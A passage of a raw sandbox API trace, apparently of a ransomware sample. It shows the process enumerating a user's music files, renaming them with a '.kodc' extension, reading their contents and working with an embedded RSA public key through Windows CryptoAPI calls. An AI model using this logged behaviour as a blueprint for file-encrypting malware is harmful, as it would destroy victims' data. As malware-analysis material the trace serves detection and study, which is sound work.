lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad60 | out: hHeap=0x630000) returned 1 [0099.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.096] GetCurrentThreadId () returned 0x42c [0099.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b90168 [0099.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.096] GetCurrentThreadId () returned 0x42c [0099.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad60 [0099.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0099.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad78 [0099.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad48 [0099.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.098] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x14dc9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.098] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.098] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.098] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.098] CloseHandle (hObject=0x5cc) returned 1 [0099.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0099.100] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\NRpZg_.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\nrpzg_.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\NRpZg_.mp3.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\nrpzg_.mp3.kodc")) returned 1 [0099.102] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66350c40, ftCreationTime.dwHighDateTime=0x1d5bcb6, ftLastAccessTime.dwLowDateTime=0x129740b0, ftLastAccessTime.dwHighDateTime=0x1d5b9b1, ftLastWriteTime.dwLowDateTime=0x129740b0, ftLastWriteTime.dwHighDateTime=0x1d5b9b1, nFileSizeHigh=0x0, nFileSizeLow=0x1045c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uaPM.m4a", cAlternateFileName="")) returned 1 [0099.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.102] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uaPM.m4a") returned=".m4a" [0099.102] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uaPM.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uapm.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.102] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=66652) returned 1 [0099.102] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.105] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10436, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.105] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.106] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x1045c, lpOverlapped=0x0) returned 1 [0099.106] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.106] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.106] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.106] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.107] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.107] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.107] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.107] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.107] GetLastError () returned 0x0 [0099.107] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.107] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.107] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.107] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.107] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10460) returned 0x9ba4d90 [0099.108] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9db58 [0099.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad30 [0099.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9dba0 [0099.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad48 [0099.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad78 [0099.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad90 [0099.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.108] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad78 | out: hHeap=0x630000) returned 1 [0099.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad90 | out: hHeap=0x630000) returned 1 [0099.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0099.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ad90 [0099.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0099.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ad78 [0099.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0099.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0099.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0099.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad90 | out: hHeap=0x630000) returned 1 [0099.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad78 | out: hHeap=0x630000) returned 1 [0099.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.109] GetCurrentThreadId () returned 0x42c [0099.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b901f8 [0099.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.109] GetCurrentThreadId () returned 0x42c [0099.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad78 [0099.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0099.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad90 [0099.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad60 [0099.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ada8 [0099.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a5b0 [0099.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0099.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad78 | out: hHeap=0x630000) returned 1 [0099.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad78 [0099.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0099.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0099.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0099.112] HeapFree 